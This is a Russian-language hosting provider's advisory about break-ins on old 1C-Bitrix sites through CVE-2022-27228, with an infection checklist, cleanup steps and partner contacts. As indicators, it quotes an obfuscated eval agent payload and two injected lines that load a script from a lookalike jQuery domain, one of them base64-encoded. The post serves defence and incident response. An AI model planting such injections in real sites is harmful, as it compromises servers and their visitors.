Авторизация на портале поддержки осуществляется в личном кабинете my.active.by (my.activecloud.ru), вкладка Поддержка. Благодарим за понимание.
RSS Feed
Новости
Apr
17

Уважаемые клиенты!

В последнее время участились взломы сайтов, использующих CMS 1С Битрикс. Критическая уязвимость старых версий CMS Битрикс (CVE-2022-27228) позволяет удалённо загрузить на сервер вредоносный код, после чего его выполнение может быть вызвано как прямым обращением к сайту, так и по заданию планировщика.
В сообщении о найденной уязвимости указано, что она содержится в модуле "vote" (уязвимость в коде данного модуля была исправлена в версии модуля 21.0.100), однако на данный момент известно, что уязвимости подвержены сайты на старых версиях Битрикс даже при отсутствии модуля vote.

Вы можете проверить факт заражения вашего сайта самостоятельно либо обратившись к разработчику сайта. Ниже приведён чек-лист - если даже отдельные его пункты подтвердились, то ваш сайт, скорее всего, был взломан:
1. В каждой директории сайта появились файлы ".htaccess"
2. В списке агентов есть подобный агент с вредоносным кодом:
$arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4%03%43%65%b4%46%c6%74%a4%26%e4%74%a4%f6%15%d6%36%67%86%96%36%f6%e4%75%05%57%15%74%a4%07%37%97%b4%07%25%97%f4%07%d4%74%a4%f6%43%75%a5%37%a4%84%46%a7%87%45%16%b6%37%44%d4%93%b6%74%a4%f6%94%33%26%d6%47%44%45%d4%65%c6%45%07%36%d6%26%07%a4%84%46%a7%86%35%05%b6%25%97%f4%07%03%c6%94%d6%24%a7%d4%23%95%75%a5%43%d4%d6%d4%d6%65%44%f4%97%55%d6%95%c6%65%74%f4%97%15%75%e4%23%55%d6%d4%53%15%44%a5%43%d4%74%a5%a6%e4%d6%94%26%65%55%35%c4%93%03%45%44%93%64%a4%f6%55%74%a5%67%e4%75%a5%b6%93%64%e4%23%55%23%36%86%a4%75%05%a6%25%97%f4%07%14%44%b4%e6%53%75%16%03%a4%33%26%77%65%d6%36%66%a4%33%26%97%a4%85%a5%76%14%84%16%77%93%44%05%22%82%56%46%f6%36%56%46%f5%43%63%56%37%16%26%02%c2%22%07%86%07%e2%f6%c6%96%57%86%f5%e6%96%47%57%07%f2%37%c6%f6%f6%47%f2%87%96%27%47%96%26%f2%22%e2%d5%22%45%f4%f4%25%f5%45%e4%54%d4%55%34%f4%44%22%b5%25%54%65%25%54%35%f5%42%82%37%47%e6%56%47%e6%f6%36%f5%47%57%07%f5%56%c6%96%66%')));
3. Отсутствует файл конфигурации "/bitrix/.settings.php"
4. Вы обнаружили изменения в главном индексном файле "index.php"
5. В конце файла "bitrix/modules/main/include/prolog.php" появилась лишняя строка:
echo "<script src='****s://**de.jquery-uii.**m/jquery-ui.js'></script>";
6. В конце файла "bitrix/js/main/core/core.js" появилась лишняя строка:
s=document.createElement(script);s.src=atob(aHR0cHM6Ly9jb2RlLmpxdWVyeS11aWkuY29tL2pxdWVyeS11aS5qcw==);document.head.appendChild(s);
7. Наличие подозрительных вставок кода в файлах "bitrix/modules/main/bx_root.php" и "bitrix/modules/main/include/prolog_after.php"

В случае, если ваш сайт был взломан, вам необходимо обратиться к разработчику для очистки сайта от вредоносного кода и обновления CMS и всех модулей сайта (таким образом закрываются уязвимости кода).
Общие рекомендации для разработчиков:
1. Восстановление сайта из резервной копии
2. Смена паролей для FTP-доступа к сайту, административной части сайта, пароля для доступа к базе данных
3. Проверить список агентов, удалить агентов с подозрительным кодом
4. Проверить планировщик заданий на наличие подозрительных заданий
5. Удалить лишние строки из указанных в чек-листе файлов, восстановить файл конфигурации "/bitrix/.settings.php", удалить лишние файлы ".htaccess"
6. Обновить CMS Битрикс и все используемые модули до актуальных версий
7. По возможности подготовить сайт к переходу на актуальные версии PHP (8.x)

Если вы не работаете с разработчиком либо у вас нет возможности обратиться к разработчику вашего сайта, вы можете обратиться к любому из перечисленных ниже партнёров ActiveCloud:
Voloshin it Agency
Сайт: voloshin.by
Контактный телефон: +375 44 771 45 36
Почта: it@voloshin.by

Атеви Системс
Сайт: atevi.by
Контактный телефон: +375 29 677-88-00
Почта: web@atevi.by

ИП Гаврилов Вячеслав Викторович
Сайт: virusolog.by
Контактный телефон: +375 29 665 47 06
Почта: support@virusolog.by

ВебСфера
Сайт: websfera.by
Контактный телефон: +375 44 777 47 30
Почта: dir@websfera.by